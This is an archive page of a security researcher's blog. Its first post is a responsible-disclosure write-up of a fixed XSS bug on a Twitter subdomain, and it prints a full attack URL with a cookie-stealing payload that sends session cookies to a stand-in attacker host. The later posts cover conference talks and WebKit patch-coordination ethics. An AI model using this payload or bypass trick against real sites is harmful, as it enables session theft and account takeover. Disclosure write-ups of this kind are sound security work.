Archive for the 'Uncategorized' Category

Monday, July 19th, 2010

Twitter XSS Bug

I recently came across a XSS vulnerability on Twitter.  99% of XSS bugs are fairly straightforward and this bug was no exception.  Getting a simple alert box was easy, but creating a payload to actually do something valuable (steal the twitter cookie, post on behalf of the victim…etc) was interesting exercise.  Nothing earth shattering or new here, but I wanted to document this just in case someone else runs into a similar situation.

Cookie scoping – Twitter.com has multiple sub domains, one of which is apiwiki.twitter.com.  APIwiki is meant to be a resource for developers looking to utilize the twitter APIs.  Fortunately for the attacker (or unfortunately for Twitter) the session cookie that represents authentication is scoped to the parent Twitter domain (.twitter.com)

With such a widely scoped cookie, a XSS bug on any of the twitter subdomains means I can steal the twitter session cookie for www.twitter.com (which is where all the action takes place).  Subdomains like apiwiki.twitter.com typically receive less security attention than the flagship domain (for many reasons) but when the session cookie is scoped to the parent domain, bugs like XSS on these overlooked subdomains have the same impact as XSS on the flagship domain.  Twitter should consider restricting the scope of their session cookie or move nonessential stuff to an alternate domain.

The XSS bug – The actual XSS bug was found here:

http://apiwiki.twitter.com/sdiff.php?first=FrontPage&second=<XSS-HERE>

sdiff.php is looking to compare two different php files.  The querystring parameters named “first” and “second” both expect to have a php filename.  If an invalid filename was provided, an exception would be thrown and an error message would be displayed.  The error message looked something like this:

Looking at the HTML source of the error page, we see the following stacktrace in the HTML Markup.  The stacktrace contains our unsanitized, attacker controlled values.  Classic XSS straight out of Web app security 101.

The Payload – Now here’s where things got interesting.  Generating a quick alert box payload was simple. I simply supplied the following value for the “second” parameter:

&second=–%3E%3Cbody%20onload=javascript:alert(1)%3E.php

Now, when I tried something a bit more complicated, I realized that any periods within the payload (other than period in the trailing “.php”) would generate a different stack trace.  This second stack trace did not contain any attacker controlled data.  So essentially, I had to generate a javascript payload to without any periods.  There are a couple ways to do this… here’s how I did it:

1:  I pulled up the actual payload I wanted to execute.  In this case, it was a simple javascript payload to grab the twitter session cookie and send it to the attacker’s webserver:

var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src=”http://attacker.com/catcher.php?domain=”+domain+”&cookie=”+ stolencookies;

2:  I appended this payload to the end of the attack URL using the # (hash) symbol.  Using the hash symbol is an old trick, primarily used to hide the XSS payload from the server.  An article written by Amit Klein was the earliest reference I could find that mentioned the hash trick back in 2005 (http://www.webappsec.org/projects/articles/071105.shtml).  In this case, I use the hash to get around the restrictions on my JavaScript payload.

&second=–%3E%3Cbody%20onload=javascript:alert(1)%3E.php# var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src=”http://attacker.com/catcher.php?domain=”+domain+”&cookie=”+ stolencookies;

3:  Now that my payload is ready I now need to find a way to call the JavaScript after the hash character, but without any periods.  The JavaScript I want to execute is:  eval(document.location.hash.substr(1));  This would eval all the JavaScript following the hash mark.  Fortunately for us, everything in JavaScript is a property of an object and can be referenced in a couple ways (for the most part).  For example, the location property belongs to the document object.  The most common way to access the location property is to call document.location, but you can also access it by calling document[‘location’].  This can be done for any property and even functions, so our injected string without periods is:

eval(document['location']['hash']['substr'](1))

(kuza’s eval(window[‘name’]) should also work here)

The final URL looked like this:

http://apiwiki.twitter.com/sdiff.php?first=FrontPage&second=–%3E%3Cbody%20onload=javascript: eval(document['location']['hash']['substr'](1))%3E.php# var stolencookies=escape(document.cookie);var domain=escape(document.location);var myImage=new Image();myImage.src=”http://attacker.com/catcher.php?domain=”+domain+”&cookie=”+ stolencookies

I reported the bug to the Twitter security team and they addressed it in a timely manner.  It was a pleasure working with them.

Posted by xssniper | Filed in Uncategorized | 7 Comments »

 

Monday, March 30th, 2009

Catching Up!

Whew!  It’s been a busy couple of months for me.  I’m always curious as to how I get so much on my plate.  A quick recap of some of the stuff I’ve been working on / or have coming in the near future:

 

1)      HITB Dubai is almost here!  I’ve been selected to give two talks at HITB in Dubai.  Although I’ve spent a significant amount of time in various parts of the Middle East, but I’ve never actually been to Dubai.  Dhillon is always an EXCELLENT host and I’m looking forward to seeing the sights .  As for the talks I’ll be giving in Dubai, the first (Biting the Hand that Feeds You – Reloaded) is an extension of a talk Nate McFeters and I gave at Defcon 15.  It involves a lot of interesting application design scenarios that introduce security weaknesses in modern day web applications.  It’s a very interesting collection of Content Ownership issues, some funky ways to abuse web application sessions, and a demo of some attacks against modern day web applications including Twitter and Facebook (respective security teams have already notified).  For the second talk (Cross Domain Leakiness), I’ll be co-presenting with Chris Evans from Google.  Chris is a super sharp guy and we’ll be talking about some interesting browser bugs we’ve discovered, as well as some techniques to bypass SSL protection mechanisms.  I’m also looking forward to seeing Nitesh Dhanjani’s talk (Psychotronica).  I’ve seen a sneak preview of the talk and it’s a very powerful illustration of how we can piece together people’s lives like jigsaw puzzles, learning more about them then they probably know about themselves!

 

2)      Jeff Carr put out the second paper in the Grey Goose Series (first paper here, second paper here).  Contact Jeff directly if you are interested in getting a GOVT only version of the papers.  Jeff has assembled a crack team of intelligence specialists (many of which wish to remain anonymous), pulling together an impressive cyber intelligence capability that probably rivals some state sponsored intelligence agencies.  The team is small enough to allow for lighting fast action without bureaucracy, but just large enough to bring an impressive intelligence eye to modern day problems.  Jeff focuses on analysis related to politically motivated events around the world.  I’m proud to be a part of the Grey Goose team, it is exciting work and perfectly in line with my background.  Jeff and I will be traveling to Estonia in June to speak at the Conference on Cyber Warfare hosted by the NATO Cooperative Cyber Defence Centre of Excellence.  We’ll be presenting a talk entitled “Sun Tzu was a Hacker” where we’ll break down the various tactics and operations associated with a real work attack against State servers.  We’ll tie the various pieces back to traditional tactics/warfare via concepts of Maneuver Warfare and Marine Corps Doctrinal Publication – 1 (Warfighting).

 

3)      My studies as an MBA student continue.  Once I finish this semester, I’ll have two classes left.  I’m currently taking a Finance class which is planting all sorts of great ideas on how to valuate risk associated with information systems.  I think it’s great that Security Researchers are seeing the value of bugs in both monetary instruments and non monetary instruments (press, notoriety…etc).  I see things like the No More Free Bugs (NMFB) campaign as financial declarations that a Security Researchers’ time/efforts/intelligence/creativity/determination is worth > $0.00.  It will be interesting to see how the next generation of security researchers/hackers will view the disclosure/NMFB paradigm and whether places like iDefense and TippingPoint will rise to “power” (if they haven’t already) as vulnerability brokers.  Maybe one day, we’ll track vulnerability worth via stock ticker, trying to game when to sell.  I’m also interested to see whether web application bugs will ever have financial value that can be easily monetized.  How much is a Gmail XSS or CSRF worth?  Are there ways to monetize?

 

4)      I’m co-authoring a book… more on this later

 

5)      I’ve started a really cool project at work that will consume lots of time…

 

6)      Oh yeah…. I have a ~3 month old baby girl that demands all my free time J

 

Where does the time go?!?!

Posted by xssniper | Filed in Uncategorized | 2 Comments »

 

Wednesday, November 19th, 2008

Pwnichiwa from PacSec!

WOW, it’s been a busy couple of weeks!  I was in Tokyo last week for PacSec.  PacSec was a great time, there were some GREAT talks, and Dragos knows how to party!  I co-presented a talk entitled “Cross-Domain Leakiness: Divulging Sensitive Information and Attacking SSL Sessions” with Chris Evans from Google.  I’m curious if this was the first time in history a Google Guy and a Microsoft Guy got on stage together and talked about security…  Anyway, you can find the slides here:

Chris is a super smart guy and demo’d a ton of browser bugs, most of which he will eventually discuss on his blog (which you should check out).  I had a chance to demo a few bugs and went over some techniques to steal Secure Cookies over SSL connections for popular sites.  Now, before I get into the details of the Safari File Stealing bug that was recently patched (provided in the next post) I did want to talk a bit about WebKit.

<WARNING Non-Technical Content Follows!>

You were warned!  Some friends and I have been playing around with Safari (we’ve got a couple bugs in the pipeline).  As everyone knows, Safari is based on the WebKit browser engine.  I think WebKit is a great browser engine and apparently so does Google because they use it for their Google Chrome.  So, once I discover and report a vulnerability in Safari for the Windows, Apple must also check Safari for Mac, and Safari Mobile for iPhone.  Additionally, “someone” should probably let Google know as their Chrome browser also takes a dependency on WebKit.  Now, who is this “someone”?   Is it the researcher?  Is it Apple?  Does the researcher have a responsibility to check to ensure this vulnerability doesn’t affect Chrome?  Does Apple have a responsibility to give Google the details of a vulnerability reported to them?  Our situation works today because we’ve got great people working for Apple and Google (like Aaron and Chris) who have the means to cooperate and work for the greater good.  However, as security moves higher and higher on the marketing scorecards and becomes more and more of a “competitive advantage” at what point will goodwill stop and the business sense take over?

Let’s contemplate a scenario that isn’t so black and white…  Let’s say two vendors both take a dependency on WebKit.  An issue is discovered, but the differences in the two browsers make it so that the implementation for the fix is different.  Vendor A has a patch ready to go, Vendor B on the other hand has a more extensive problem and needs a few more days/weeks/months.  Should Vendor A wait for Vendor B to complete their patch process before protecting their own customers and pushing patches for their own products?

Let’s flip the scenario… Let’s say Vendor A has a vulnerability reported to them.  Vendor A determines that the issue is actually in WebKit.  Vendor A contacts Vendor B and discovers that Vendor B isn’t affected… does this mean Vendor B knew about issue, fixed the issue, and didn’t tell Vendor A?  Do they have a responsibility to?

Posted by xssniper | Filed in Uncategorized | 1 Comment »